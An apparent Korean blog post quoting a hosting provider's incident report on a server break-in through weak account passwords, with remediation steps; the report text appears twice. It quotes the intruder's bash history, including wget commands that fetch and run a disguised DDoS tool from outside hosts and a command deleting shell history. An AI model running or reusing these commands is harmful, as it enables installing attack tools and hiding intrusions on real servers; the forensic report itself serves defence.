헐... ㅎ햌힝
안녕하세요.
카페24 호스팅입니다.
유선상 안내해드린 개선하실점을 이행 해주시기바랍니다.
1. root 접속을 할수 있는 아이피를 지정해 특정 아이피 접근외에는 모두 접근 거부를 해주시기바랍니다.
2. 불필요한계정은 모두 삭제 해주시기바랍니다.
조사 보고서 입니다.
* 원인 ***, ***등의 계정 취약
-> 단순 비밀번호로 설정된 것으로 보임
* *** 계정에서 해킹(DDos 공격용)툴 발견됨
[root@egghyun3 ***]# ls -al
합계 135160
drwxrwxrwx 4 root root 4096 11월 10 10:54 .
drwxr-xr-x 10 root root 4096 11월 9 17:32 ..
drwxr-xr-x 3 *** *** 4096 11월 10 07:00 .Music
-rw------- 1 *** *** 736 11월 10 06:40 .bash_history
-rwxr-xr-x 1 *** *** 1108248 11월 9 16:35 W2Ksp3.exe
-rw-r--r-- 1 *** *** 130978672 7월 24 2002 W2Ksp3.exe.1
-rw-r--r-- 1 root root 6133760 11월 9 14:58 aa.tar
drwxrwxrwx 13 root root 4096 11월 8 09:34 www
* 해당 계정 접속 ! 뼁
[root@egghyun3 .Music]# last test | more
*** pts/0 125.180.86.53 Tue Nov 10 07:59 - 07:59 (00:00)
*** pts/0 212-166-158-18.r Tue Nov 10 06:33 - 06:40 (00:06)
*** pts/0 212-166-158-18.r Mon Nov 9 16:34 - 16:39 (00:04)
*** pts/1 212-166-158-18.r Mon Nov 9 13:07 - 13:16 (00:09)
*** pts/0 212-166-158-18.r Mon Nov 9 13:04 - 13:14 (00:10)
*** pts/0 ip103.208-100-42 Mon Nov 9 11:28 - 11:32 (00:03)
*** pts/0 112.216.83.178 Sun Nov 8 09:27 - 09:30 (00:03)
*** pts/0 125.40.47.185 Sun Nov 8 01:39 - 01:39 (00:00)
*** pts/0 124.254.14.153 Sat Nov 7 06:58 - 06:59 (00:00)
*** pts/0 218.15.163.222 Sat Nov 7 02:40 - 02:41 (00:00)
*** pts/0 110.12.26.58 Fri Nov 6 16:42 - 16:43 (00:01)
*** pts/0 110.12.26.58 Fri N! ov 6 16:37 - 16:40 (00:03)
* 접속국가
212.166.! 158.18 - > spain ip
* 사용된 커맨드
wget http://209.163.187.219/stealth.tgz
tar zxvf stealth.tgz
rm -rf stealth.tgz
mv stealth .Music
cd .Music
ls -a
chmod +x *
nano cyc.set
nano cyc.acc
ls -a
PATH=\".\" syslogd
* 사용된 스크립트
[root@egghyun3 .Music]# ./stealth --help
twitch@Stealth:
This tool is extremely dangerous. Use at your own risk!
Usage: st-kill
* 사용자 history 내역,
-> root 권한 획득을 위한 exploit 시도했으나, history가 지워져있어 확인할 방법이 없음, history 로그상 일반 계정으로 쉘 실행한것으로 보아 root 획득은 하지 못한것으로 보임
[root@egghyun3 ***]# cat .bash_history
w
wget http://download.microsoft.com/download/win2000platform/SP/SP3/NT5/EN-US/W2Ksp3.exe
uname -a
w
ls -a
rm -rf enlightenment
cat .bash_history
rm -rf \".bash_history\"
ps x
ls -a
bash
w
ps x
cd /dev/shm
ls -a
c! d
cd /var/tmp
ls -a
cd
wget http://emonel.webs.com/copil.tar ; tar xvf copil.tar ; rm -rf copil.tar ; mv aws platform ; cd platform ; mv linux sshd ; chmod +x * ; PATH=\".\" sshd
ls -a
cat .bash_history
wget http://download.microsoft.com/download/win2000platform/SP/SP3/NT5/EN-US/W2Ksp3.exe
wget http://209.163.187.219/stealth.tgz
tar zxvf stealth.tgz
rm -rf stealth.tgz
mv stealth .Music
cd .Music
ls -a
chmod +x *
nano cyc.set
nano cyc.acc
ls -a
PATH=\".\" syslogd
w
ls -a
ps x
w
ls -a
exit
w
ps x
uname -a
ps x
bash
ps x
exit
* 불필요한 사용자 쉘차단
***:x:27:27:MySQL Server:/var/lib/mysql:/sbin/nologin
***:x:500:501::/home/playcast:/bin/bash
***:x:501:502::/home/test:/sbin/nologin
***:x:502:502::/home/test3:/sbin/nologin
***:x:503:502::/home/land:/sbin/nologin
* whistl 검색 결과, 이상없음
[root@eg! ghyun3 whistl]# ./whistl_kernel_2.6
Checking the configrat! ion
[Config] Checking directory : /home/test
[Config] Inspection Center directory : /tmp
Checking the update status
[INFO] Pattern Update Finished
Checking /home/test directory
[Not Found]
[root@egghyun3 whistl]# ./whistl_kernel_2.6
Checking the configration
[Config] Checking directory : /home/egghyun
[Config] Inspection Center directory : /tmp
Checking the update status
[INFO] Pattern Update Finished
Checking /home/egghyun directory
[Not Found]
* 해당 쉘 파일 소유권 및 권한 변경 후, 디렉토리 이동
[root@egghyun3 Music]# pwd
/root/hacking/Music
[root@egghyun3 Music]# ll
합계 648
---------- 1 root root 259 11월 10 07:13 cyc.acc
---------- 1 root root 22465 6월 13 2001 cyc.help
---------- 1 root root 1047 11월 10 07:13 cyc.levels
---------- 1 root root 6 11월 10 06:38 cyc.pi! d
---------- 1 root root 353 11월 10 07:13 cyc.session
---------- 1 root root 1332 11월 10 06:38 cyc.set
d--------- 2 root root 4096 11월 10 10:57 randfiles
---------- 1 root root 13399 7월 5 2005 stealth
---------- 1 root root 590481 7월 14 2005 syslogd
감사합니다.
헐....일부 *로 가렸습니다
외주코더와 공용으로 FTP를 써야할일이 있어
아이디/비번을 간단하게 만들어서 썻더니 이런일이 생기네요
어그제 그계정으로 FTP접속이 안되길레 오늘 확인해보니 패스워드도 바꿔버렸더라구요 ㅠ
카페24 호스팅입니다.
유선상 안내해드린 개선하실점을 이행 해주시기바랍니다.
1. root 접속을 할수 있는 아이피를 지정해 특정 아이피 접근외에는 모두 접근 거부를 해주시기바랍니다.
2. 불필요한계정은 모두 삭제 해주시기바랍니다.
조사 보고서 입니다.
* 원인 ***, ***등의 계정 취약
-> 단순 비밀번호로 설정된 것으로 보임
* *** 계정에서 해킹(DDos 공격용)툴 발견됨
[root@egghyun3 ***]# ls -al
합계 135160
drwxrwxrwx 4 root root 4096 11월 10 10:54 .
drwxr-xr-x 10 root root 4096 11월 9 17:32 ..
drwxr-xr-x 3 *** *** 4096 11월 10 07:00 .Music
-rw------- 1 *** *** 736 11월 10 06:40 .bash_history
-rwxr-xr-x 1 *** *** 1108248 11월 9 16:35 W2Ksp3.exe
-rw-r--r-- 1 *** *** 130978672 7월 24 2002 W2Ksp3.exe.1
-rw-r--r-- 1 root root 6133760 11월 9 14:58 aa.tar
drwxrwxrwx 13 root root 4096 11월 8 09:34 www
* 해당 계정 접속 ! 뼁
[root@egghyun3 .Music]# last test | more
*** pts/0 125.180.86.53 Tue Nov 10 07:59 - 07:59 (00:00)
*** pts/0 212-166-158-18.r Tue Nov 10 06:33 - 06:40 (00:06)
*** pts/0 212-166-158-18.r Mon Nov 9 16:34 - 16:39 (00:04)
*** pts/1 212-166-158-18.r Mon Nov 9 13:07 - 13:16 (00:09)
*** pts/0 212-166-158-18.r Mon Nov 9 13:04 - 13:14 (00:10)
*** pts/0 ip103.208-100-42 Mon Nov 9 11:28 - 11:32 (00:03)
*** pts/0 112.216.83.178 Sun Nov 8 09:27 - 09:30 (00:03)
*** pts/0 125.40.47.185 Sun Nov 8 01:39 - 01:39 (00:00)
*** pts/0 124.254.14.153 Sat Nov 7 06:58 - 06:59 (00:00)
*** pts/0 218.15.163.222 Sat Nov 7 02:40 - 02:41 (00:00)
*** pts/0 110.12.26.58 Fri Nov 6 16:42 - 16:43 (00:01)
*** pts/0 110.12.26.58 Fri N! ov 6 16:37 - 16:40 (00:03)
* 접속국가
212.166.! 158.18 - > spain ip
* 사용된 커맨드
wget http://209.163.187.219/stealth.tgz
tar zxvf stealth.tgz
rm -rf stealth.tgz
mv stealth .Music
cd .Music
ls -a
chmod +x *
nano cyc.set
nano cyc.acc
ls -a
PATH=\".\" syslogd
* 사용된 스크립트
[root@egghyun3 .Music]# ./stealth --help
twitch@Stealth:
This tool is extremely dangerous. Use at your own risk!
Usage: st-kill
* 사용자 history 내역,
-> root 권한 획득을 위한 exploit 시도했으나, history가 지워져있어 확인할 방법이 없음, history 로그상 일반 계정으로 쉘 실행한것으로 보아 root 획득은 하지 못한것으로 보임
[root@egghyun3 ***]# cat .bash_history
w
wget http://download.microsoft.com/download/win2000platform/SP/SP3/NT5/EN-US/W2Ksp3.exe
uname -a
w
ls -a
rm -rf enlightenment
cat .bash_history
rm -rf \".bash_history\"
ps x
ls -a
bash
w
ps x
cd /dev/shm
ls -a
c! d
cd /var/tmp
ls -a
cd
wget http://emonel.webs.com/copil.tar ; tar xvf copil.tar ; rm -rf copil.tar ; mv aws platform ; cd platform ; mv linux sshd ; chmod +x * ; PATH=\".\" sshd
ls -a
cat .bash_history
wget http://download.microsoft.com/download/win2000platform/SP/SP3/NT5/EN-US/W2Ksp3.exe
wget http://209.163.187.219/stealth.tgz
tar zxvf stealth.tgz
rm -rf stealth.tgz
mv stealth .Music
cd .Music
ls -a
chmod +x *
nano cyc.set
nano cyc.acc
ls -a
PATH=\".\" syslogd
w
ls -a
ps x
w
ls -a
exit
w
ps x
uname -a
ps x
bash
ps x
exit
* 불필요한 사용자 쉘차단
***:x:27:27:MySQL Server:/var/lib/mysql:/sbin/nologin
***:x:500:501::/home/playcast:/bin/bash
***:x:501:502::/home/test:/sbin/nologin
***:x:502:502::/home/test3:/sbin/nologin
***:x:503:502::/home/land:/sbin/nologin
* whistl 검색 결과, 이상없음
[root@eg! ghyun3 whistl]# ./whistl_kernel_2.6
Checking the configrat! ion
[Config] Checking directory : /home/test
[Config] Inspection Center directory : /tmp
Checking the update status
[INFO] Pattern Update Finished
Checking /home/test directory
[Not Found]
[root@egghyun3 whistl]# ./whistl_kernel_2.6
Checking the configration
[Config] Checking directory : /home/egghyun
[Config] Inspection Center directory : /tmp
Checking the update status
[INFO] Pattern Update Finished
Checking /home/egghyun directory
[Not Found]
* 해당 쉘 파일 소유권 및 권한 변경 후, 디렉토리 이동
[root@egghyun3 Music]# pwd
/root/hacking/Music
[root@egghyun3 Music]# ll
합계 648
---------- 1 root root 259 11월 10 07:13 cyc.acc
---------- 1 root root 22465 6월 13 2001 cyc.help
---------- 1 root root 1047 11월 10 07:13 cyc.levels
---------- 1 root root 6 11월 10 06:38 cyc.pi! d
---------- 1 root root 353 11월 10 07:13 cyc.session
---------- 1 root root 1332 11월 10 06:38 cyc.set
d--------- 2 root root 4096 11월 10 10:57 randfiles
---------- 1 root root 13399 7월 5 2005 stealth
---------- 1 root root 590481 7월 14 2005 syslogd
감사합니다.
헐....일부 *로 가렸습니다
외주코더와 공용으로 FTP를 써야할일이 있어
아이디/비번을 간단하게 만들어서 썻더니 이런일이 생기네요
어그제 그계정으로 FTP접속이 안되길레 오늘 확인해보니 패스워드도 바꿔버렸더라구요 ㅠ
|
댓글 작성
댓글을 작성하시려면 로그인이 필요합니다.
로그인하기